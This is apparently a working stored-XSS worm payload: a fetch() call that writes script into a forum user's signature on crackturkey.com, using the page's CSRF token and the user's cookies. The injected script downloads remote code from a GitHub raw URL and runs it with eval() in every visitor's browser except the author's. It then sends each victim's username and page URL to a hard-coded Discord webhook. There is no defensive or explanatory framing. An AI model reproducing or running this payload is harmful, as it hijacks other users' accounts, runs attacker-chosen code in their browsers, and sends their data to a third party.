fetch("https://crackturkey.com/account/signature", {
  "headers": {
    "accept": "application/json, text/javascript, */*; q=0.01",
    "accept-language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7",
    "content-type": "multipart/form-data; boundary=----WebKitFormBoundaryBTXX2pAt0BjE3vzJ",
    "sec-ch-ua": "\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Google Chrome\";v=\"96\"",
    "sec-ch-ua-mobile": "?0",
    "sec-ch-ua-platform": "\"Windows\"",
    "sec-fetch-dest": "empty",
    "sec-fetch-mode": "cors",
    "sec-fetch-site": "same-origin",
    "x-requested-with": "XMLHttpRequest"
  },
  "referrer": "https://crackturkey.com/account/signature",
  "referrerPolicy": "strict-origin-when-cross-origin",
  "body": '------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"signature_html\"\r\n\r\n<div data-xf-p=\"1\">[PARSEHTML]&lt;script&gt;</div><div data-xf-p=\"1\"><br></div><div data-xf-p=\"1\">{</div><div data-xf-p=\"1\">&nbsp; &nbsp; function sendMessage(data) {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; const request = new XMLHttpRequest();</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; request.open(\"POST\", \"https://discord.com/api/webhooks/911725942706176090/ELGmhq08qcHEfNO1KuVtC79Z-kt59iu84jUC2XKH4NZuPb7TwuTQxJW8hKKNbEXH3XU8\");</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; request.setRequestHeader('Content-type', 'application/json');</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; const params = {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;username: \"Forum Logs\",</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;avatar_url: \"\",</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;content: data</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; }</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; request.send(JSON.stringify(params));</div><div data-xf-p=\"1\">&nbsp; &nbsp; }</div><div data-xf-p=\"1\"><br></div><div data-xf-p=\"1\"><br></div><div data-xf-p=\"1\">&nbsp; &nbsp; let cvcvka5xhr = new XMLHttpRequest();</div><div data-xf-p=\"1\">&nbsp; &nbsp; cvcvka5xhr.onreadystatechange = () =&gt; {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; if (cvcvka5xhr.readyState === 4)</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; eval(cvcvka5xhr.responseText)</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; console.log(\"cvcv on top.\");</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; sendMessage(`Copied to ${document.querySelector(\"#top &gt; nav &gt; div &gt; div.p-nav-opposite &gt; div.p-navgroup.p-account.p-navgroup--member &gt; a.p-navgroup-link.p-navgroup-link--iconic.p-navgroup-link--user &gt; span.p-navgroup-linkText\").textContent} from url ${window.location.href}`)</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; }</div><div data-xf-p=\"1\">&nbsp; &nbsp; }</div><div data-xf-p=\"1\">&nbsp; &nbsp; if (document.querySelector(\"#top &gt; nav &gt; div &gt; div.p-nav-opposite &gt; div.p-navgroup.p-account.p-navgroup--member &gt; a.p-navgroup-link.p-navgroup-link--iconic.p-navgroup-link--user &gt; span.p-navgroup-linkText\").textContent !== \"cvcvka5\")</div><div data-xf-p=\"1\">&nbsp; &nbsp; {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; cvcvka5xhr.open(\"GET\", \"https://raw.githubusercontent.com/cvcvka5/001crcktr/main/blank.txt\")</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; cvcvka5xhr.send()</div><div data-xf-p=\"1\">&nbsp; &nbsp; }</div><div data-xf-p=\"1\">&nbsp; &nbsp; else {</div><div data-xf-p=\"1\">&nbsp; &nbsp; &nbsp; &nbsp; console.log(\"Welcome master...\")</div><div data-xf-p=\"1\">&nbsp; &nbsp; }</div><div data-xf-p=\"1\">}</div><div data-xf-p=\"1\">&lt;/script&gt;[/PARSEHTML]</div>\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"_xfToken\"\r\n\r\n'+document.querySelector("[name=_xfToken]").value+'\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"_xfRequestUri\"\r\n\r\n/account/signature\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"_xfWithData\"\r\n\r\n1\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"_xfToken\"\r\n\r\n'+document.querySelector("[name=_xfToken]").value+'\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ\r\nContent-Disposition: form-data; name=\"_xfResponseType\"\r\n\r\njson\r\n------WebKitFormBoundaryBTXX2pAt0BjE3vzJ--\r\n',
  "method": "POST",
  "mode": 'cors',
  "credentials": "include"
});
